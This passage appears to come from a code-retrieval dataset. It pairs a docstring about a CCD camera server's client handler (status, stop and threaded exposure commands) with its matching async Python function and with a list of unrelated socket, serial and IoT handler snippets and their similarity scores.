keywords = {\"type\": action_type}\n keywords.update(data[\"d\"])\n self.sessionhandler.data_in(self, bot_data_in=(\"\", keywords))", "def comms_callback(received, prog):\n\n try:\n self.handle_incoming_bytes(received)\n return int(self.__comm_term) \n\n except Exception as e:\n self.__comm_term = True\n self.__comm_exc = e\n return 1", "def _process_input(self, fd):\n if fd.fileno() == self._proxyfd.fileno():\n pkt = self._grab_packet(\n lambda data, s=self: s.create_packet(packet=data), fd)\n self._handle_proxy_packet(pkt)\n else:\n Server._process_input(self, fd)", "def handle(self):\n socket = self.request[1]\n data = self.request[0].strip()\n logger.info(\"Address {} at {} wrote: '{}'\".format(self.client_address[1], self.client_address[0], data))\n cmd_strn, ret = self.command_service(data)\n print(ret)\n self.command_response(cmd_strn, ret, self.request[1], self.client_address[0],\n self.mapInterface.router[cmd_strn])", "def handle_message(self, data, channel):\n pass", "def _on_interest(self, int_name, int_param, _app_param):\n if int_param.must_be_fresh:\n return\n data_bytes = self.storage.get_data_packet(int_name, int_param.can_be_prefix)\n if data_bytes == None:\n return\n self.app.put_raw_packet(data_bytes)\n logging.info(f'Read handle: serve data {Name.to_str(int_name)}')", "def _send_data(self):\n pass", "def handle_one_request(self):\n import socket\n try:\n self.raw_requestline = self.rfile.readline(65537)\n if len(self.raw_requestline) > 65536:\n self.requestline = ''\n self.request_version = ''\n self.command = ''\n self.send_error(414)\n return\n if not self.raw_requestline:\n self.close_connection = 1\n return\n if not self.parse_request():\n # An error code has been sent, just exit\n return\n\n ##### Customization\n # origin\n \"\"\"\n mname = 'do_' + self.command\n if not hasattr(self, mname):\n self.send_error(501, \"Unsupported method (%r)\" % self.command)\n return\n method = getattr(self, mname)\n method()\n \"\"\"\n # now\n #import pdb; pdb.set_trace()\n self.delegate(self.get_environ(), self.gen_response, self.send_error)\n\n self.wfile.flush() #actually send the response if not already done.\n except socket.timeout, e:\n #a read or a write timed out. Discard this connection\n self.log_error(\"Request timed out: %r\", e)\n self.close_connection = 1\n return", "def receive():\n pass", "def handleActuatorCommandMessage(self, data: ActuatorData) -> bool:\n\t\tlogging.info(\"[CDA_CALLBACK]----->>>The handleActuatorCommandMessage method is being called\")\n\t\tif data:\n\t\t\tlogging.info(\"Processing actuator command message.\")\n\t\t\t\n\t\t\t# TODO: add further validation before sending the command\n\t\t\tself.actuatorAdapterManager.sendActuatorCommand(data)\n\t\t\treturn True\n\t\telse:\n\t\t\tlogging.warning(\"Received invalid ActuatorData command message. Ignoring.\")\n\t\t\treturn False", "def request() -> None:\n\t_flag.set()", "def process_request(self, request):\n self.req = request\n command = self.get_command()\n file_handler = filehandler.FileHandler(command)\n file_handler.handle_command()\n return command.result", "def do_on_input_update(self, msg_id, payload, player):\n pass", "def collect_incoming_data(self, data):\n self.in_buffer.append(data)\n self.in_buffer_len += len(data)\n # Flush buffer if it gets too long (possible DoS attacks).\n # RFC-959 specifies that a 500 response could be given in\n # such cases\n buflimit = 2048\n if self.in_buffer_len > buflimit:\n self.respond('500 Command too long.')\n self.log('Command received exceeded buffer limit of %s.' %(buflimit))\n self.in_buffer = []\n self.in_buffer_len = 0", "def handle_read(self):\n pass", "def handle_input(self, text):\n for tsk in self.commands:\n for expr in tsk.starters:\n match_test = expr.pattern.match(text)\n if match_test:\n arg_dict = {}\n if len(match_test.groups()) == 0: # informationless command\n arg_dict = {expr.arg_names[0]: text}\n else:\n arg_dict = gen_dict(\n expr.arg_names, match_test.groups())\n self.overseer.start_process(\n tsk.name, tsk.thread_func, arg_dict)\n return\n if not self.overseer.is_running(tsk.name):\n continue\n for expr in tsk.command_patterns:\n match_test = expr.pattern.match(text)\n if match_test:\n print(\"Attempting to send command '\", text, \"' to\", tsk.name)\n if self.overseer.is_blocked(tsk.name):\n print(\"Error: blocked channel\")\n return\n arg_dict = {}\n if len(match_test.groups()) == 0: # informationless command\n arg_dict = {expr.arg_names[0]: text}\n else:\n arg_dict = gen_dict(\n expr.arg_names, match_test.groups())\n self.overseer.send_args(tsk.name, arg_dict)\n return", "def inReadEvent(self):\r\n try:\r\n self._checkAssert()\r\n if self.handshaker:\r\n self._doHandshakeOp()\r\n elif self.closer:\r\n self._doCloseOp()\r\n elif self.reader:\r\n self._doReadOp()\r\n elif self.writer:\r\n self._doWriteOp()\r\n else:\r\n self.reader = self.tlsConnection.readAsync(16384)\r\n self._doReadOp()\r\n except:\r\n self._clear()\r\n raise", "def _got_remote(self, data):\n self._recv_buffer += data", "def _handle_MonitorData (self, event, packet, reverse):\n pass", "def data_received(self, data):\n if self.session is not None:\n size = len(data)\n self.logger.debug('process_data(%r, %d)', data, size)\n self.session.process_data(data, size)", "def recvCommand(self):\n return", "def handle(self):\n self.ip = self.client_address[0]\n self.port = self.client_address[1]\n self.connection = self.request\n #self.logged_in = False\n\n # Loop that listens for messages from the client\n while True:\n received_string = self.connection.recv(4096).strip()\n if received_string:\n jsonObject = json.loads(received_string)\n request = jsonObject.get('request')\n #print(received_string)\n #self.handle_data(received_string)\n if request == 'login':\n print 'logging in'\n self.login(jsonObject)\n elif request == 'logout':\n self.logout()\n elif request == 'msg':\n self.send(jsonObject)\n elif request == 'names':\n self.getNames()\n elif request == 'help':\n return \"geiegohruuhiegr\"\n else:\n return \"you suck\"\n\n else:\n print('The client is disconnected.')\n break \n # TODO: Add handling of received payload from client", "def process_sensor_params(self, data: dict):\n LOGGER.info('Receiving sensor data from TORQUE', **data)\n has_non_value_keys = any(filter(re.compile(f'.*(unit|user).*', re.IGNORECASE).match, data.keys()))\n if has_non_value_keys:\n LOGGER.info('Will ignore request since it\\'s related to sensor params')\n return\n\n user = self._resolve_user(data)\n LOGGER.info(f'Request is attached to {user.first_name} {user.last_name}', user_id=user.id)\n session = SessionController(user_id=user.id).get_or_create(data['session'])\n LOGGER.info('Resolved session to proceed', **session.to_dict())\n\n car_state = CarState.create_from_torque(self.db_session, session, data)\n if car_state:\n LOGGER.info('Created Car State', **car_state.to_dict())\n self.db_session.commit()", "def handle(self):\n req_lines = self._read_lines()\n if not req_lines:\n self.cleanup()\n for req in req_lines:\n log.debug('%s => %s', self.client, req)\n req = req.split()\n cmd = req.pop(0)\n try:\n self.get_command(cmd)(req)\n result = [OK]\n except Exception as error:\n result = [ERROR, error.message]\n self.send_line(' '.join(result))\n self.flush()", "def handle(self): \n \n data = self.request[0].strip()\n self.socket = self.request[1]\n\n #split off first word of file, assume is filename\n filename,sep,data = data.partition(\" \")\n\n #assume is requesting file\n if not data:\n self.sendfile(filename)\n #assume we have to save the file since data was sent\n else:\n self.savefile(filename,data)\n\n return True", "def dataReceived(self, data: bytes):\n\n if self.output:\n self.output.write(data) # redirect the message to the server", "def request_capturing(self):\n self.socket.sendall(pack('B', codes['request_pokemon']))\n self.receive_pokemon_suggestion()", "def __receive_request(self):\n # get the request's length\n request_size = self.__socket.recv(Commands.SIZE_LENGTH)\n # if the master sent an empty msg, then he has closed himself\n if not request_size:\n print \"Master Has Been Closed\"\n # TODO: close the peasant and start the run function all over again\n return False\n # fix the request's length\n request_size = int(request_size) - Commands.COMMAND_LENGTH\n # get the request's command's number\n command = int(Commands.decrypt(self.__socket.recv(Commands.COMMAND_LENGTH)))\n # if the request size's is 0, then there are not args\n args = []\n # else, there are args, read them (decrypted)\n if request_size != 0:\n args = Commands.decrypt(self.__socket.recv(request_size)).split(Commands.SEPARATE_CHAR)\n if self.__DEBUG:\n print args\n # handle the command and add the command number and return value to the responses list\n self.__responses.append(str(command) + Commands.handle_command_request(command, args))\n return True", "def _handleSensorDataAnalysis(self, data: SensorData):\n\t\tlogging.info(\"[CDA_CALLBACK]----->>>The _handleSensorDataAnalysis method is being called\")\n\t\t\n\t\t\"\"\"\n\t\t\"\"\"\n\t\tif self.enableHandleTempChangeOnDevice and data.getSensorType() == SensorData.TEMP_SENSOR_TYPE:\n\n\t\t\tad = ActuatorData(actuatorType = ActuatorData.HVAC_ACTUATOR_TYPE)\n\t\t\tvalue = data.getValue()\n\t\t\tif value >= self.triggerHvacTempFloor and value <= self.triggerHvacTempCeiling:\n\t\t\t\tad.setCommand(ActuatorData.COMMAND_OFF)\n\t\t\telse:\n\t\t\t\tad.setCommand(ActuatorData.COMMAND_ON)\n\t\t\t\n\t\t\tself.actuatorAdapterManager.sendActuatorCommand(ad)\n\t\t\t\n\t\t\"\"\"\n\t\t\"\"\"\n\t\tif self.enableHandleSoilHumidityChangeOnDevice and data.getSensorType() == SensorData.SOIL_HUMIDITY_SENSOR_TYPE:\n\t\t\t\n\t\t\tad = ActuatorData(actuatorType = ActuatorData.SPRINKLER_ACTUATOR_TYPE)\n\t\t\tvalue = data.getValue()\n\t\t\tif value >= self.triggerWaterDeviceHumiCeiling: \n\t\t\t\tad.setCommand(ActuatorData.COMMAND_OFF)\n\t\t\t\tself.actuatorAdapterManager.sendActuatorCommand(ad)\n\t\t\telif value <= self.triggerWaterDeviceHumiFloor:\n\t\t\t\tad.setCommand(ActuatorData.COMMAND_ON)\n\t\t\t\tself.actuatorAdapterManager.sendActuatorCommand(ad)\n\t\t\t\tself.coapClient.sendGetRequest(ResourceNameEnum.CDA_ACTUATOR_CMD_RESOURCE, False, 5)\n\t\t\telse:\n\t\t\t\tself.coapClient.sendGetRequest(ResourceNameEnum.CDA_CLOUD_ACTUATOR_CMD_RESOURCE, False, 5)", "async def on_receive(self, room_id, inp_type, params):\n pass", "def process_arguments(self):\n if self.args.list_attacks:\n # User wants to see the available attacks\n self.process_attack_listing()\n else:\n # User wants to process a PCAP\n self.process_pcap()", "def handle_event(self):\n self.done = False\n while not self.done:\n try:\n callback_item = self.eventq.get(timeout=1)\n if callback_item == 'finish':\n print ('done')\n self.done = True\n else:\n current_ctr = callback_item\n if current_ctr > self.current_counter + 1:\n self.event('missing frames')\n self.current_counter = current_ctr + 1\n\n try:\n print ('current cntr', self.current_counter)\n pv_pairs = {}\n slice = np.array(caget(self.get_data_pv_name()))\n print ('pvname', self.get_data_pv_name())\n # read other pvs\n for pv in self.pvs:\n pv_pairs[pv] = (self.pvs[pv], caget(self.pvs[pv]))\n print ('pv pairs', pv_pairs)\n if slice is None:\n self.done = True\n self.event('reading image times out, possibly the detector exposure time is too small')\n else:\n slice.resize(self.sizex, self.sizey)\n data = ut.Data(slice, pv_pairs)\n # deliver data to monitor\n self.deliver_data(data)\n except:\n self.done = True\n self.event('reading image raises exception, possibly the detector exposure time is too small')\n except tqueue.Empty:\n continue\n\n self.finish()", "def dataReceived(self, data):\n print \"received:\", data", "def send_parameters(self, port_select, input_set, sample_rate, filter_select, corner_freq_upper, corner_freq_lower, corner_freq):\n try:\n ctrl_comm_obj.open(port_select)\n except ValueError as e:\n return False\n cnt = 0\n cursor = 0\n wait = 0\n while cnt < 3 and cursor < 5:\n if cursor == 0 and wait == 0:\n self.send_input(port_select, input_set)\n wait = 1\n elif cursor == 1 and wait == 0:\n self.send_sample_rate(port_select, sample_rate)\n wait = 1\n elif cursor == 2 and wait == 0:\n self.send_filter(port_select, filter_select)\n wait = 1\n elif cursor == 3 and wait == 0:\n self.send_corner_freq(port_select, corner_freq_upper, corner_freq_lower, corner_freq, filter_select)\n wait = 1\n elif cursor == 4 and wait == 0:\n self.send_start(port_select)\n wait = 1\n if wait == 1:\n if self.recieve_acknowlege_zybo(port_select):\n print(\"Ack received\")\n cursor += 1\n cnt = 0\n wait = 0\n else:\n pass\n else:\n cnt += 1\n if cnt < 3:\n print(\"Commands Sent/Received\")\n else:\n print(\"Commands Not Sent/Received\")\n ctrl_comm_obj.close()\n\n return True", "def process_cmd(self, cmd):\n\n resp = self.COMMANDS[cmd.cmd](cmd)\n\n logger.debug(\"Resp: %s\" % resp)\n # send to resp_queue\n # if type == G.CTRL_TYPE:\n #\n # response = json.dumps((corr_id, routing_key, resp))\n # logger.debug(\"Sending response: %s\" % response)\n # self.out_queue.put(response)\n\n response = cmd.make_response(resp)\n logger.debug(\"Sending response: %s\" % response)\n self.out_queue.put(str(response))", "def buffer_input(data, buffer, input_data):\n return weechat.WEECHAT_RC_OK", "def _handler_command_enter(self, *args, **kwargs):\n # Command device to update parameters and send a config change event.\n # Tell driver superclass to send a state change event.\n # Superclass will query the state.\n self._driver_event(DriverAsyncEvent.STATE_CHANGE)", "def do_input(self, line):\n cmd_args = io.parse_cmd_args(line, io.input_cmd_pattern)\n if cmd_args:\n success = self.manager.input(\n cmd_args.get('target'), \n cmd_args.get('cslist'), \n mode=cmd_args.get('mode')\n )\n if success:\n self.console_print(\"Yippee! input successfull!\", settings.INFO_FORMAT)\n else:\n self.console_print(\"Sorry, something kinda went wrong! You can try again.\", settings.ERROR_FORMAT)\n else:\n self.console_print(settings.COMMMAND_ARGS_ERROR_MSG, settings.ERROR_FORMAT)", "async def _receive_new_request(self, data):\n serializer = TextAlgorithmPromptSerializer(data=data)\n\n # don't throw exceptions in the regular pattern raise_exception=True, all\n # exceptions need to be properly handled when using channels\n valid = serializer.is_valid()\n\n if not valid:\n return await self.return_invalid_data_prompt(data)\n\n prompt_serialized = serializer.validated_data\n\n cache_key = get_cache_key_for_text_algo_parameter(**prompt_serialized)\n cached_results = await get_cached_results(cache_key)\n if cached_results:\n return await self.send_serialized_data(cached_results)\n\n # technically a bug can probably occur if separate users try the same exact\n # phrase in the 180 seconds, but if that happens, that means the servers are probably\n # crushed from too many requests anyways, RIP\n duplicate_request = await check_if_cache_key_for_parameters_is_running(\n cache_key\n )\n if duplicate_request:\n print(\"Duplicate request already running.\")\n return\n\n # if it doesnt' exist, add a state flag to say this is going to be running\n # so it will automatically broadcast back when if the frontend makes a duplicate request\n await set_request_flag_that_request_is_running_in_cache(cache_key)\n\n # switch auth styles, passing it here makes it a little bit more cross-operable\n # since aiohttp doesn't pass headers in the same way as the requests library\n # and you're too lazy to write custom middleware for one endpoint\n # the ml endpoints are protected via an api_key to prevent abuse\n prompt_serialized[\"api_key\"] = settings.ML_SERVICE_ENDPOINT_API_KEY\n\n # pass the websocket_uuid for the ML endpoints to know how to communicate\n prompt_serialized[\"websocket_uuid\"] = self.group_name\n prompt_serialized[\"cache_key\"] = cache_key\n\n model_name = prompt_serialized[\"model_name\"]\n url = get_api_endpoint_from_model_name(model_name)\n\n await self.post_to_microservice(url, prompt_serialized)", "def _handle_read(self):\n pass", "def accept_command():\n # TODO", "def _handle_received_line(self, line): # This is Propeller specific\n self._Counter += 1\n self._serialTimeout = 0\n\n msg = None\n try:\n msg = SerialMessage(data = line)\n except SerialMessageError:\n rospy.logwarn(\"Invalid line: \" + line)\n return\n\n self._SerialPublisher.publish(String(str(self._Counter) + \", in: \" + line))\n if msg.msg_class == SerialMessage.STATUS_CLASS:\n if msg.msg_type == SerialMessage.STATUS_ODOMETRY_MESSAGE:\n self._broadcast_odometry_info(msg)\n elif msg.msg_type == SerialMessage.STATUS_OP_STATE_MESSAGE:\n # The operational state message contains a lot of information, but during startup\n # only portions of it are used\n # First, the robot needs to be configured with the drive geometry and operational state\n # There is a message for drive geometry and one for operational state\n\n if not msg.drive_geometry_received:\n rospy.loginfo(\"Need to config drive geometry\")\n self._initialize_drive_geometry()\n\n elif not msg.op_state_received:\n rospy.loginfo(\"Need to config operational state\")\n self._initialize_op_state(msg)\n\n elif not self._op_state_set and msg.drive_geometry_received and msg.op_state_received:\n self._op_state_set = True\n\n elif self._op_state_set:\n self._broadcast_arlo_status(msg)\n elif msg.msg_type == SerialMessage.STATUS_US_SENSOR_MESSAGE:\n # Publish Ultrasonic data\n # Note: the mapping of sensors to higher-level constructs, lower deck, upper deck, front lower, back lower\n # needs to be done here as well. Maybe there should be a mapping param that gives a label to indicies, \n # e.g., \"front lower deck\" : 0 .. 4, \"rear lower deck\" : 5 .. 9, then that information could be used\n # to publish the raw sensor data into those contructs.\n self._handle_us_sensors(msg.payload)\n \n elif msg.msg_type == SerialMessage.STATUS_US_SENSOR_MESSAGE:\n # Publish Infrared data\n self._handle_ir_sensors(msg.payload)\n \n elif msg.msg_class == SerialMessage.DEBUG_CLASS:\n # Map the levels from the debug message to rospy log levels, e.g. info, warn, debug, fatal, etc\n # and then write them to rospy.logxxx.\n pass\n else:\n # Log something about this bad message\n rospy.logwarn(\"Unknown message class: \" + str(msg))", "def callback_client_receive(data):\n data: GameStateModel = JSONSerializer.deserialize(data)\n logger.debug(f\"Client received {data.__class__.__name__} object from host.\")\n # print(f\"Client received {data.__class__.__name__} object from host.\")\n if isinstance(data, GameStateModel):\n GameStateModel.set_game(data)\n return\n if isinstance(data, TurnEvent) or isinstance(data, ActionEvent):\n exec_thread = threading.Thread(target=data.execute)\n exec_thread.start()", "def callback_dat(fd_):\n # receive data\n data = os.read(fd_, 8)\n if data == '':\n return\n data, = struct.unpack('<Q', data)\n # TODO: Interpret data" ]
[ "0.61772895", "0.6057597", "0.59728074", "0.5919234", "0.57503784", "0.5750175", "0.5683027", "0.5636862", "0.5570763", "0.5540126", "0.5496406", "0.5487305", "0.54842824", "0.5481451", "0.54694", "0.54545176", "0.5411232", "0.54028386", "0.5396897", "0.53862023", "0.5382583", "0.537729", "0.53699607", "0.5359767", "0.53521496", "0.5351944", "0.53509635", "0.5343589", "0.5342194", "0.532774", "0.53239757", "0.5302966", "0.5297956", "0.52978003", "0.52972203", "0.5282272", "0.52748275", "0.5272434", "0.5267803", "0.5265094", "0.52622813", "0.52622813", "0.52605367", "0.5257414", "0.524552", "0.5232534", "0.52306247", "0.52116704", "0.5204273", "0.51955074", "0.5185503", "0.5172371", "0.5166835", "0.51632136", "0.5152194", "0.5144449", "0.5139546", "0.51388097", "0.5137107", "0.5135375", "0.5133882", "0.5132204", "0.51321375", "0.5130502", "0.5088108", "0.50866115", "0.50835305", "0.507413", "0.50715584", "0.506968", "0.5068289", "0.5058568", "0.5057683", "0.5057455", "0.5055766", "0.5053053", "0.50472105", "0.5040193", "0.5034261", "0.5031764", "0.5029566", "0.5028936", "0.50288063", "0.5028763", "0.50139064", "0.50134945", "0.50130785", "0.50123715", "0.5008258", "0.50071585", "0.50061214", "0.5005188", "0.5003882", "0.500378", "0.50031966", "0.5002159", "0.4987712", "0.49869424", "0.49824223", "0.4979812" ]
0.57042426
6
This is the method that receives the client's data and decides what to do with it. It runs in a loop to always be accepting new connections. If the data is 'status', the CCD status is returned. If the data is 'stop', the current exposure is stopped. If the data is anything else, a new thread is created and the data is sent to handle_command().
async def handle_client(reader, writer): request = None # loop to continually handle incoming data while request != 'quit': request = (await reader.read(255)).decode('utf8') print(request.encode('utf8')) #log.info('COMMAND = '+request) writer.write(('COMMAND = '+request.upper()+'\n').encode('utf8')) response = 'BAD' # check if data is empty, a status query, or potential command dataDec = request if dataDec == '': break elif 'status' in dataDec.lower(): response = 'OK' # check if the command thread is running try: if exposureState() > 0: response = response + '\nBUSY' else: response = response + '\nIDLE' except: response = response + '\nIDLE' if ccd_frame[0].s == PyIndi.ISS_ON: frameType = 'LIGHT' elif ccd_frame[1].s == PyIndi.ISS_ON: frameType = 'BIAS' elif ccd_frame[2].s == PyIndi.ISS_ON: frameType = 'DARK' elif ccd_frame[3].s == PyIndi.ISS_ON: frameType = 'FLAT' response = response+\ '\nBIN MODE = '+str(ccd_bin[0].value)+'x'+str(ccd_bin[1].value)+\ '\nCCD TEMP = '+str(ccd_temp[0].value)+\ 'C\nLAST FRAME TYPE = '+str(frameType)+\ '\nFILE DIR = '+str(fileDir)+\ '\nLAST IMAGE = '+str(imgName) # send current status to open connection & log it #log.info('RESPONSE: '+response) writer.write((response+'\nDONE\n').encode('utf-8')) elif 'stop' in dataDec.lower(): # check if the command thread is running try: if comThread.is_alive(): response = 'OK: aborting exposure' ccd_abort[0].s=PyIndi.ISS_ON indiclient.sendNewSwitch(ccd_abort) blobEvent.set() #Ends the currently running thread. response = response+'\nExposure Aborted' else: response = 'OK: idle' except: response = 'OK: idle' # send current status to open connection & log it #log.info('RESPONSE = '+response) writer.write((response+'\nDONE\n').encode('utf-8')) else: # check if the command thread is running, may fail if not created yet, hence try/except try: if comThread.is_alive(): response = 'BAD: busy' # send current status to open connection & log it #log.info('RESPONSE = '+response) writer.write((response+'\nDONE\n').encode('utf-8')) else: # create a new thread for the command comThread = threading.Thread(target=handle_command, args=(log, writer, dataDec,)) comThread.start() except: # create a new thread for the command comThread = threading.Thread(target=handle_command, args=(log, writer, dataDec,)) comThread.start() await writer.drain() writer.close()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def handleRecvData(self, data):\n\n\t\t#Look for commands\n\t\tif data == 'Hello':\n\t\t\t#Inform client it is 'connected'\n\t\t\tself.transmit(\"Welcome\")\n\n\t\telif data == 'kill':\t\n\t\t\t#Stop the server running\n\t\t\tself.running = False\n\n\t\telif data == 'control':\n\t\t\t#Print out if in control of car\n\t\t\tprint(\"Control query\")\n\t\t\tif self.arduino:\n\t\t\t\t#print(self.address)\n\t\t\t\tself.transmit(\"Control: True\")\n\t\t\telse:\n\t\t\t\t#print(self.address)\n\t\t\t\tself.transmit(\"Control: False\")\n\n\t\telif data == 'Hello?':\n\t\t\t#The client is still alive therefore set missing count to 0\n\t\t\tself.missingCount = 0\n\n\t\t#Look for Arduino Data\n\t\telif self.arduino:\n\t\t\t#Check if controlling the car and it's a valid car command\n\t\t\tif self.arduino.readPack(data): \n\t\t\t\tprint(self.address)\n\t\t\t\tprint(\"Sent to arduino: %s\" % data)\n\t\t\telse:\n\t\t\t\t#Print out other data\n\t\t\t\tprint(\"Not valid Arduino data\")\n\t\t\t\tprint(self.address)\n\t\t\t\tprint(data)\n\n\t\telse:\n\t\t\t#All other data print out\n\t\t\tprint(self.address)\n\t\t\tprint(data)", "def handle(self):\n print \"Client %s:%s connected\" % self.client_address\n self.controller = False\n\n try:\n while not self.server.is_shutting_down.is_set():\n command = self.rfile.readline().strip()\n\n # meta commands: these control the meta operations\n # they do not drive the robot\n if not command:\n self.send_output('ok', '')\n continue\n\n if command == 'exit':\n self.send_output('ok', 'done')\n break\n\n if command == 'shutdown':\n self.send_output('ok', 'shutdown')\n self.server.shutdown()\n # the main thread will shut down the robot\n break\n\n if command == 'control':\n if self.controller:\n self.send_output('ok', 'was already a controller')\n else:\n self.controller = self.server.control_lock.acquire(blocking = 0)\n if self.controller:\n self.send_output('ok', 'acquired control lock')\n else:\n self.send_output('error', 'cannot acquire control lock')\n\n continue\n\n try:\n output = self.process_command(command)\n\n # got an invalid command (could not parse\n except CommandError, e:\n self.send_output('invalid', e.message)\n # driver rejected the command, but not due to an error\n except (drivers.common.ParameterError, drivers.common.StoppedError), e:\n self.send_output('rejected', e.message)\n # unknown error -- send error to the client, and log the exception\n except Exception, e:\n traceback.print_exc()\n self.send_output('error', str(e))\n else:\n self.send_output('ok', output)\n self.server.last_request = time.time()\n\n finally:\n output = [\"%s:%s disconnected\" % self.client_address]\n if self.controller:\n self.server.control_lock.release()\n self.server.robot.stop()\n output.append(\"; robot stopped. no more controlling client\")\n else:\n output.append(\"; was a viewer\")\n\n print \"\".join(output)", "def handle(self):\n self.ip = self.client_address[0]\n self.port = self.client_address[1]\n self.connection = self.request\n #self.logged_in = False\n\n # Loop that listens for messages from the client\n while True:\n received_string = self.connection.recv(4096).strip()\n if received_string:\n jsonObject = json.loads(received_string)\n request = jsonObject.get('request')\n #print(received_string)\n #self.handle_data(received_string)\n if request == 'login':\n print 'logging in'\n self.login(jsonObject)\n elif request == 'logout':\n self.logout()\n elif request == 'msg':\n self.send(jsonObject)\n elif request == 'names':\n self.getNames()\n elif request == 'help':\n return \"geiegohruuhiegr\"\n else:\n return \"you suck\"\n\n else:\n print('The client is disconnected.')\n break \n # TODO: Add handling of received payload from client", "def run(self):\n self._create_command_socket()\n\n self._is_running = True\n\n # self._clear_buffer(data_socket)\n\n # prevent recv from block indefinitely\n self._socket.settimeout(DataThread.TIMEOUT)\n\n while self._is_running:\n try:\n data = self._socket.recv(SIZE_BUFFER)\n if len(data):\n self._adapter.process_message(data)\n except (KeyboardInterrupt, SystemExit, OSError):\n print('Exiting data socket')\n\n except socket.timeout:\n print('NatNetClient command socket timeout!')\n continue\n\n self._close_socket()", "def run(self):\n print('ClientThread[{}] is running!'.format(self.threadID))\n while True:\n request = self.receive()\n try:\n requestcode = request.split(',')[0]\n if requestcode == 'SYNCFROM':\n self.syncToClient()\n continue\n elif requestcode == 'SYNCTO':\n self.syncFromClient()\n continue\n elif requestcode == 'GETINDEX':\n self.sendIndex()\n continue\n elif requestcode == 'CLOSE':\n print('Connection to {}:{} closed'.format(self.ip,self.port))\n self.tcpsock.close()\n break\n elif not request:\n continue\n else:\n print(request, type(request))\n raise Exception('Unexpected bytes from client.')\n except KeyboardInterrupt:\n sys.exit()\n except Exception as err:\n traceback.print_exc()\n continue\n self.tcpsock.close()\n print('ClientThread[{}] exiting..'.format(self.threadID))", "def run(self):\n\n try:\n while True:\n self.log.info(\"Waiting for a connection...\")\n self.mc.events.post('client_disconnected')\n self.connection, client_address = self.socket.accept()\n\n self.log.info(\"Received connection from: %s:%s\",\n client_address[0], client_address[1])\n self.mc.events.post('client_connected',\n address=client_address[0],\n port=client_address[1])\n\n # Receive the data in small chunks and retransmit it\n while True:\n try:\n data = self.connection.recv(4096)\n if data:\n commands = data.split(\"\\n\")\n for cmd in commands:\n if cmd:\n self.process_received_message(cmd)\n else:\n # no more data\n break\n\n except:\n if self.mc.config['mediacontroller']['exit_on_disconnect']:\n self.mc.shutdown()\n else:\n break\n\n except Exception:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n lines = traceback.format_exception(exc_type, exc_value, exc_traceback)\n msg = ''.join(line for line in lines)\n self.mc.crash_queue.put(msg)", "def run(self):\n # pylint: disable=unused-variable\n try:\n LOGGER.debug(\"starting session from client %s\",\n str(self._client_address))\n self._data_handler.on_start(self)\n read_list = [self._sock]\n\n self._state.transit(sitcpy.THREAD_RUNNING)\n while self._state() == sitcpy.THREAD_RUNNING:\n try:\n readable, _, _ = select.select(read_list, [], [], 0.1)\n if self._sock in readable:\n\n # Receive data.\n byte_data = self._sock.recv(self._max_buff)\n if not byte_data:\n LOGGER.error(\"readable socket with no data. closing session\")\n break\n byte_data = self._rest_byte_data + byte_data if self._rest_byte_data else byte_data\n\n # Find delimiter position\n delimiter_pos = self._data_handler.find_delimiter_position(byte_data)\n\n if delimiter_pos >= 0:\n # If delimiter found.\n if not self._data_handler.on_data(self, byte_data[:delimiter_pos]):\n break\n self._rest_byte_data = byte_data[delimiter_pos:]\n else:\n # If delimiter not found.\n self._rest_byte_data = byte_data\n\n self._data_handler.on_idle(self)\n except Exception as exc:\n LOGGER.error(\"Exception at SessionThread.run : %s\", str(exc))\n raise\n del read_list[:]\n finally:\n self.close()\n self._state.transit(sitcpy.THREAD_STOPPED)", "def main(self):\n while True:\n if not self.data_server_command.empty():\n command_data_server = self.data_server_command.get()\n if command_data_server[0] == 4:\n thread.start_new_thread(self.get_file, (command_data_server[1],))\n else:\n self.data_server_command_def[command_data_server[0]](command_data_server[1])", "def run(self):\n\n\t\t#Begin running the clientHandler\n\t\tself.running = True\n\t\tself.rxThread.start()\n\n\t\twhile self.running:\n\t\t\ttime.sleep(0.1)\n\t\n\t\t\t#Keep a count of the number of missing Hello requests, over 5 kill client\n\t\t\tif self.missingCount >= 5:\n\t\t\t\tself.running = False", "def handle(self):\n self.ip = self.client_address[0]\n self.port = self.client_address[1]\n self.connection = self.request\n\n state.addConnection(self.connection)\n\n # Loop that listens for messages from the client\n while True:\n received_string = self.connection.recv(4096)\n\n if len(received_string) == 0:\n continue\n\n # TODO: Add handling of received payload from client\n\n # Convert payload from JSON to object\n payloadToData = json.loads(received_string)\n\n # determine what request is being made\n request_handler = RequestHandler(payloadToData,\n state,\n self.connection)\n\n # execute and generate response (JSON formatted)\n jsonResponse = request_handler.callHandler()\n\n if not jsonResponse == 'BROADCAST':\n # send response\n self.connection.send(bytes(jsonResponse, \"ascii\"))", "def _dispatch_from_client_request(self):\n # Listen for client connection\n self._from_client_request.listen()\n\n while not self._exit_request:\n readable, _, _ = select([self._from_client_request], [], [self._from_client_request], 0.1)\n\n if readable:\n client_conn, client_addr = readable[0].accept()\n client_conn.setblocking(False)\n\n client_name_read, _, _ = select([client_conn], [], [client_conn])\n if client_name_read:\n client_name = json.loads(client_name_read[0].recv(cfg.HEADER).decode('utf-8'))\n else:\n print(\"Connection closed\")\n continue\n\n self._thread_lock.acquire()\n self._from_client_connections[client_conn] = client_name\n self._state[client_name] = 0\n self._thread_lock.release()\n\n print(\"Receiving commands from [\" + client_name + \", \" + client_addr[0] + \", \" + str(client_addr[1]) + ']')", "def run(self):\n self._create_data_socket()\n\n self._is_running = True\n\n # self._clear_buffer(data_socket)\n\n # prevent recv from block indefinitely\n self._socket.settimeout(DataThread.TIMEOUT)\n\n while self._is_running:\n try:\n data = self._socket.recv(SIZE_BUFFER)\n if len(data):\n self._adapter.process_message(data)\n except (KeyboardInterrupt, SystemExit, OSError):\n print('Exiting data socket')\n\n except socket.timeout:\n print('NatNetClient data socket timeout!')\n continue\n\n self._close_socket()", "def receive_data_from_server(self):\n while not self._stop_receive.is_set():\n # seems irrelevant now\n # if not self._pause_receive.is_set():\n try:\n # We are doing handshaking, so this is fine\n _server_reply = self.receive(True)\n if _server_reply:\n self._reply_queue.append(_server_reply)\n self.callback_client_receive(_server_reply)\n except MastermindErrorClient:\n logger.error(\"Mastermind Error:\")\n info = sys.exc_info()\n traceback.print_exception(*info)\n self.callback_disconnect()\n except OSError:\n logger.warning(\"OS ERROR, disconnecting client.\")\n info = sys.exc_info()\n traceback.print_exception(*info)\n self.callback_disconnect()", "def process(self):\n try:\n (data, peer) = self._socket.recvfrom(1024)\n request = json.loads(data.decode())\n command = request['command']\n method = getattr(self, 'do_' + command)\n try:\n result = 